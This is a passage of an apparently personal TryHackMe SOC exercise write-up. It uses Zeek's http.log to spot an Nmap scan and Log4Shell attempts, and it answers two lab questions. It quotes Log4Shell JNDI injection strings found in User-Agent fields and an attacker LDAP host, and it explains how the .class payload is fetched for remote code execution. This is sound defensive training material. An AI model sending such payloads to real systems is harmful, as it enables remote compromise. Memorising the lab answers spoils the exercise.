aisha-x/THM/Rooms/SOC Level 1/Network Security and Traffic Analysis/Zeek Exercises.md

 - `cat http.log | zeek-cut user_agent | sort | uniq `
 - ![image](https://github.com/user-attachments/assets/f3b24cb0-b317-43d1-885d-bc699a462e79)
--`${jndi:ldap://127.0.0.1:1389}` -> these are malicious payload attempting to exploit the *Log4shell* vulnerability by injecting `${jndi:ldap://...}` into `User-Agent` field, hoping a vulnerable server logs them and triggers a remote JNDI lookup which can result in **remote code execution**
-- `127.0.0.1:1389` -> Likely testing locally for vulnerability.
-- `192.168.56.102:389` -> The attacker controls this host and is attempting to force a vulnerable system to connect back and load a malicious Java class.
-- `Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)` -> An Nmap script scan, likely probing web services.

 Ans: ***nmap***

 ### Q3.
 Investigate the http.log file.
 What is the extension of the exploit file?

 - `cat http.log | zeek-cut uri | sort | uniq `
 - ![image](https://github.com/user-attachments/assets/42ebf332-42f2-46ee-bfdf-f848340dfff4)
-- Attacker injects `${jndi:ldap://attacker-ip}` into a request (you've seen this in `user_agent`).
-- A vulnerable system logs this input.
-- The system then contacts the attacker’s LDAP server (`192.168.56.102`).
-- The LDAP server responds with a reference to a `.class` file, e.g., `ExploitXXXX.class`.
-- The system downloads and executes it — **Remote Code Execution**.

 Ans: ***.class***